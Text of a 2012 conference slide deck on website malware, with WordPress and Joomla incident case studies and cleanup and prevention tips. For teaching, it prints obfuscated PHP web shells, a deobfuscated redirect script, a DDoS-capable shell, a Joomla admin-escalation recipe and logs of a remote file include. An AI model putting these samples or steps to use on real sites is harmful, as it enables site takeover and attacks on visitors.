Embed Size (px)
DESCRIPTION
Talk from Desert CodeCamp 2012.
Citation preview
‘Twas the Night before
Malware…Presented byArleen Hess
Pax Whitmore
Twas the night before malware, and all through the house,
Not a peripheral was stirring, not even the mouse.
The plugins were arranged and running with care,
In the hopes that customers soon would be there.
When out in the logs there arose such a clatter,
I sprang to my terminal to see what was the matter.
And what to my wondering eyes should appear,
But KAK and FilesMan were all up in here.
The new site was running, the dev site was shed,
And users into the website were led,
WordPress in its kerchief, and Joomla! in its cap,
Had just fallen in to the ol' malware trap.
Disclaimer
• The thoughts and opinions expressed in this presentation are those of the presenters and are not a reflection of the official policies or positions of GoDaddy.com, LLC.
About Us
Outline
• What is malware?• All for LULZ?• Why look at a CMS?• Discovering malware• Malware examples – WordPress– Joomla!– FTP Compromise
• How to find and fix malware• How to prevent malware
What is malware?
• Short for malicious software• Used to disrupt websites in a variety of ways– Redirect users to phishing sites– Download files onto users’ computers– Use exploited system as a base of DDoS or
phishing attacks
All for LULZ?
Why look at a CMS?
• Content Management Systems are widely-used– WordPress 3.4 has over 23 million downloads– Joomla! powers over 2600 government sites
• Open-source applications are complex• Wide range of plugins and themes
Discovering Malware…
• Site owner alerted by users
• Users being blocked or redirected
• Found site was listed on Google Safe Browsing
WordPress – Search
• Ran a script to search for common malicious content
2011-11-23 00:53:42 /wp-content/themes/mainstream /cache/74bd10fe94d1b17c86da24fd8df55f65.php
2012-09-09 14:19:08 /wp-content/themes/mainstream /cache/27b23905b513a0ba176072cae7f53ede.php
2012-10-24 02:40:28 /wp-content/themes/mainstream /cache/ca0f54f8f7599facfa9af8b66ac11a5f.php
WordPress – Content strings 74bd10fe94d1b17c86da24fd8df55f65.phpGIF89a??????????!??????,?????;?$language = 'eng';$auth = 0;$name = ''; // md5 Login$pass = ''; // md5 Password/
**************************************************************************************************************************************************************/
error_reporting(0);$bery="7b17e9pVsjj8f54n307R+gwwgzHibxs79vh+W[snip]iyHw4+KGLx/
jYt9xQylp4qX+7QqTvmwNSHgUHnBEgKlU81/2eylkbI2gTR7pjAHRsY4CpqSbdYG3tzrqSWRcnpPUt5vPrJ6lC87bINeAc7hVDl3tKh+VCzNwDDQnqnJnCLWGylTdAKpSc1mV7emKh5OG704OiDJKaX8rEUzG1ozt/eAnjTMAuGYX2MuwG7M7J4OhpX09AAdqgq4uLFn05UmpXeURYo2w7oqae6boO9S0QaoOEhsp6uvE1yKsYASiywIF2QsTi2YP2PQqu/Olr9nW6vCxJ4DS3Tja9fKyzmsWYqQqMizcIf8kQMzVmreD8wkr5bgzqQBDYXYuxBtKtCI3R2qkH5A4e5+sh11Q0Tr2uoNyxcF/8ZNl5bnjj2KJtdjFmpRY/GntsG/jRa8LF+Ckypw0+rpXmNldO+yb2szqAOgnnqZ0oLmL9tE0gtjrDqMzSqR1n1OFumcPabprJ6j8gEB6UqyT+T+EhWGS/icAUOlxF2Gd/1L/vWnf5anMFCDBv5Q9NpWbOPg4w9P7/2TG7wLHiMW0Uf1mQWIXPL7AoG/TI4w/Roen7eloac8Adio9dzv7WirfgeJnGg6UvPrCr/Pw==";
eval(gzinflate(str_rot13(base64_decode($bery))));
WordPress – Content strings 27b23905b513a0ba176072cae7f53ede.phpGIF89a eval (base64_decode
("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIERuZkNEMVJTRzZrRDggK
strings ca0f54f8f7599facfa9af8b66ac11a5f.php
/*gHrE={M*/eval/*t%)t*/(/*_f0srO*/base64_decode/*\x31sm*/(/*Y%>\\*/'Lyo/WFdNR2Z5byovZXZhbC8qTEBXfjUqLygvKidoSCovYmFzZTY0X2RlY29kZS8qNXJcYzAqLygvKjo+ZEMqLydMeW83VmtwQlN6NHFMMmxtTHlwN2IxNHFMeWd2S24nLyp0XVJKOiovLi8qYVw+Ml1rKi8nUTlPSHRtTlM0cUwybHpjMlYwTHlwQWV6WlJMU292Jy8qPn5NLSovLi8qLmBrVGdVTCovJ0tDOHFPVEJlTkU4cUx5UmZVa1ZSVlVWVFZDOHFXRycvKik6WiovLi8qOURGREl5cyovJ29sZmpZcUwxc3ZLa1JsYkNvdkoyRW5MeW9vTVNseCcvKkZiTkBXSSovLi8qYkR2SzYqLydWQ292TGk4cWZGVXdYQ292SjNOakp5OHFKazAzTWknLypmKTR7cSovLi8qfU9KV1hmKi8nb3ZYUzhxZWpaeUlGd3FMeThxVW1rM1dYQXFMeWt2Jy8qIHtTKzs8PiovLi8qbWU/UyovJ0tuSmRQelZOS2k4dktpWkRmQ292S1M4cVpWTnNYbicvKmBhcEgmMkwqLy4vKlJPTzslKi8nNThLaTls'/*`!3'1W*/./*Py1!!Ff5>*/'ZG1Gc0x5cDdXV0VxTHlndktpdFVKa2NxJy8qOWlhLksqLy4vKltFPEpOPCovJ0wzTjBjbWx3YzJ4aGMyaGxjeThxZEhsV0tpOG9MeScvKklUdlh+di0qLy4vKlZRcyovJ3BoSlNZK0tpOGtYMUpGVVZWRlUxUXZLajl0VDA5dycvKkV3PiovLi8qVmM9SXJXZyovJ09rcDFLaTliTHlwUlJqRXBLaThuWVNjdktrMWNRVScvKjhmZCovLi8qYmFbNSovJ01xTHk0dktuUkVaMWtxTHlkell5Y3ZLbWxUZUhGTScvKjt2O3I7WyAqLy4vKis2XFQzKi8nUWxRcUwxMHZLakJtWjFjcUx5OHFOSHRtVTJBcUx5Jy8qbURzMigqLy4vKid7aHEqLydrdkttWlNXRThoTFNaQ0tpOHZLaTAyWG50eEtpOHAnLypjTXEqLy4vKkRxcyovJ0x5cHVWSFJKS2k4dkttUjNPMHNxTHpzdkttUW9KeW92Jy8qPE1NVCovKS8qRlZQbyovLyp7T15LKi8pLypRRkttZnYwKi8vKn5PSiovOy8qP2QxZldzKi8='/*XYx!oU92*/)/*3{]}s*//*,NC123~P*/)/*m!?`\*//*w!blx*/;/*upY`MI2*/
Deobfuscation ==error_reporting(0);$qazplm=headers_sent();if (!$qazplm){$referer=$_SERVER['HTTP_REFERER'];$uag=$_SERVER['HTTP_USER_AGENT'];if ($uag) {if (!stristr($uag,"MSIE 7.0")){if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or
stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun(dot)ru") or stristr($referer,"stumbleupon(dot)com") or stristr($referer,"bit(dot)ly") or stristr($referer,"tinyurl(dot)com") or preg_match("/yandex\(dot)ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace(dot)com") or stristr($referer,"facebook(dot)com") or stristr($referer,"aol(dot)com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){header("Location: http://malicious(dot)evulz(dot)com/");exit();
WordPress – Log Review
x.x.x.x - - [09/Sep/2012:14:18:58 -0700] "GET /wp-content/themes/mainstream/functions/thumb.php?src=http://blogger.evulz.tld/stat/n/s.php HTTP/1.1" 404
x.x.x.x - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php HTTP/1.1" 200
x.x.x.x - - [09/Sep/2012:14:19:07 -0700] "GET /wp-content/themes/mainstream/thumb.php?src=http://blogger. evulz.tld/stat/n/s.php HTTP/1.1" 200
WordPress – What Happened?
• Attackers used thumb.php
• Three separate times– Over one year
• Thumb.php was not updated
• Uploaded shells were used to alter other content
Joomla! – How it works
– Exploiting Joomla! 1.6.x/1.7.x/2.5.0-2.5.2• index.php?option=com_users&view=registration
– Start to register a user account– Cause the registration process to fail• Failing to enter the same pwd twice• Failing the captcha
– Before submitting elevate user privilege to admin• Firebug: <input name="jform[groups][]" value="7" />• Tamper Data: jform[groups][]=7
– Complete registration when the form reloads
Joomla!
• Sample logs showing the registration of the malicious user:
x.x.x.x - - [02/Aug/2012:09:03:32 -0700] "POSTevulz.tld/component/users/?task=registration.registerHTTP/1.1" 303
x.x.x.x - - [02/Aug/2012:09:03:34 -0700] "POST evulz.tld/component/users/?task=registration.register HTTP/1.1" 303
Joomla!• Sample logs showing the error.php file being edited:
x.x.x.x - - [04/Aug/2012:00:31:17 -0700] "POSTevulz.tld/administrator/index.php HTTP/1.1" 303
x.x.x.x - - [04/Aug/2012:00:31:23 -0700] "POSTevulz.tld/administrator/index.php?option=com_templates&layout=editHTTP/1.1" 303
x.x.x.x - - [04/Aug/2012:00:31:25 -0700] "POSTevulz.tld/administrator/index.php HTTP/1.1" 303
x.x.x.x.x - - [04/Aug/2012:00:31:28 -0700] "POSTevulz.tld/administrator/index.php?option=com_templates&layout=editHTTP/1.1" 303
Joomla! - Contenterror_reporting(0);$base = dirname(__FILE__)."/";function stoped() {
unlink($base."stph.php");unlink($base."stcp.php");cmdexec("killall ping;");cmdexec("killall -9 perl; killall -9 perl-bin;killall -9 perl-cgi;");unlink($base."start.php");unlink($base."f1.pl");unlink($base."run.pl");unlink($base."startphp.php");
print "<stopcleandos>Stop & Clean</stopcleandos>";
function UploadFile($File){
cmdexec("killall -9 perl");cmdexec("killall -9 perl-bin");cmdexec("killall -9 perl-cgi");$target_path ="./";$target_path = $target_path . basename( $File['name']);@move_uploaded_file($File['tmp_name'], $target_path);
}function cmdexec($cmd){
if(function_exists('exec'))@exec($cmd);
elseif(function_exists('shell_exec'))@shell_exec($cmd);
Joomla! - Content
$up = "<?php eval(gzinflate(base64_decode('jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+Vc2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1aTi2mGSmT8L/Lj7mfJwd/8B')));
Joomla! - Contentswitch($_POST['action']){
case "upload":UploadFile($_FILES['file']);break;case "stop":stoped();break;case "ust":$page = curPageURL();$ip = $_POST['ip'];$port = "11";$out = $page."\n";$socket = stream_socket_client("udp://$ip:$port");if ($socket) {stream_set_write_buffer($socket, 0);stream_socket_sendto($socket,$out);
}fclose($socket);break;case "ab":$url = $_POST['url'];$c = $_POST['c'];$n = $_POST['n'];cmdexec("ab -c $c -n $n $url");break;default:DNullRequest();break;}
The moral of the Joomla! Story…
FTP Compromise2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [15608]created SomeMaliciousFile.exe2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14608]closed - - 426 0 0 - -2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14608]created
/MyRealUser/Dir1/MyDownloaderSetupFull.exe2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711]USER MyRealUser2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711]PASS - - 230 0 0 - -2012-10-18 22:08:22 x.x.x.x MyRealUser 21 [14711]CWD /MyRealUser/Dir1 2012-10-18 22:12:06 x.x.x.x MyRealUser 21 [14609]appended /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:16:45 x.x.x.x MyRealUser 21 [14609]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:19:56 x.x.x.x MyRealUser 21 [14711]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:21:07 x.x.x.x MyRealUser 21 [14609]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:34:05 x.x.x.x MyRealUser 21 [14609]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:37:42 x.x.x.x MyRealUser 21 [14711]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:46:51 x.x.x.x MyRealUser 21 [14711]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:48:14 x.x.x.x MyRealUser 21 [14609]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:51:20 x.x.x.x MyRealUser 21 [14711]created /MyRealUser/Dir1/SomeMaliciousFile.exe2012-10-18 22:51:56 x.x.x.x MyRealUser 21 [14711]created SomeMaliciousFile.exe - 550 0 240120 -
How FTP Gets Compromised
• Keyloggers or other malicious software on your computer
• Gaining FTP access via your own credentials and IP
How to find and fix malware
• Automated tools or scripts search for common phrases or exploits
• Check commonly affected files, such as .htaccess, header.php, footer.php, etc.
• Check for odd filenames or typos (e.g. indx.php vs. index.php)
• Review and edit each file individually• Restore from clean backups (which everyone
keeps, right?)
How to prevent malware
• Keep your web application up-to-date• Regularly check your content• Use strong and unique passwords• Ensure your own computer is secure• Remove unused or old content from server• Keep your clean backups totally separate
Tools
• http://www.rexswain.com/httpview.html• http://jsunpack.jeek.org/• http://home.paulschou.net/tools/xlate/• https://www.owasp.org/index.php/Main_Page• http://nvd.nist.gov/• http://osvdb.org/• http://codex.wordpress.org/
Hardening_WordPress
